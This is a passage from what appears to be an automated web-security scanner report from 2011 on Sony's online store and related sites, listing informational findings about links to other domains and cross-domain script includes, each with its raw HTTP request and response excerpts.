<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://green.sel.sony.com/index.html" target="_blank" class="redArrowLink">Recycling Program</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://esupport.sony.com/" target="_blank" class="redArrowLink">Online Product Support</a>
...[SNIP]...
<h4 class="sectionHeader"><a href="http://esupport.sony.com/US/perl/contact-land.pl" target="_blank" class="redArrowLink">Contact Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.9. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73360
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=gKhUalwoDI2z%2bNprXZ4zIKFzImo%3d%0a%3b2011%2d06%2d23+11%3a19%3a57%2e352%5f1308841107995%2d82466%5f10151%5f241903390%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:57 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903390=241903390%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG4oMGqREaYXQdgrhlLJv3qbvnxtslAf5G4pPtDsUOINJCueV5cMMwxhx5ni8RjGeSOa%0asInl12kMoEjmCmyUzHwfxteaIruGewQaiLBIDV0gTI%2bF6NR9bXRaayEonpmxIhImeBdp%2fZ1DQQ%3d%3d; Path=/
Set-Cookie: TS5bbf46=8cda39d87185f14d1bf971f120ead6895e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e6ced6c50a378910e; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.10. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480

Response

HTTP/1.1 200 OK
ntCoent-Length: 93671
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 93671
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:08 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast &amp; Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.11. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78597
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:28 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

10.12. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gDefault_v2.asp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion= HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: http://www.websitealive5.com/4405/rRouter.asp?groupid=4405&websiteid=150&departmentid=5101&dl=http%3A//www.omnitechsupport.com/about.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:28 GMT
Content-Length: 15042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a href="http://www.omnitechsupport.com" target="_blank"><img src="https://images.websitealive.com/images/hosted/upload/9106.gif" style="margin-top:10px; margin-bottom:20px; margin-left:25px;border:none;"></a>
...[SNIP]...

11. Cross-domain script include
There are 20 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


11.1. http://script.aculo.us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://script.aculo.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: script.aculo.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 23 Jun 2011 15:19:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Content-Length: 13458

<!DOCTYPE html>
<html>
<head>
<title>script.aculo.us - web 2.0 javascript</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/rs
...[SNIP]...
</center>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

11.2. http://twitter.com/sonyoutletusa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /sonyoutletusa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308842373-2439-32037
ETag: "face9414ffcb37b56c235fd4a36ddf88"
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 23 Jun 2011 15:19:33 GMT
X-Runtime: 0.00853
Content-Type: text/html; charset=utf-8
Content-Length: 19872
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2a867da6018348b9ab53639033d7a20fdada72a0
Set-Cookie: k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLWwFb0wAToHaWQiJTJhY2JhYzVmNTU0YjJj%250AYmZhNWMyNDRmNDVkODk5OGIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8c7fe27671279233551b5c47933be7b27d397a15; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1308769086/javascripts/twitter.js?1308259133" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/lib/jquery.tipsy.min.js?1308259133" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/lib/gears_init.js?1308259133" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1308769086/javascripts/lib/mustache.js?1308259133" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/geov1.js?1308259132" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/api.js?1308259132" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1308769086/javascripts/lib/mustache.js?1308259133" type="text/javascript"></script>
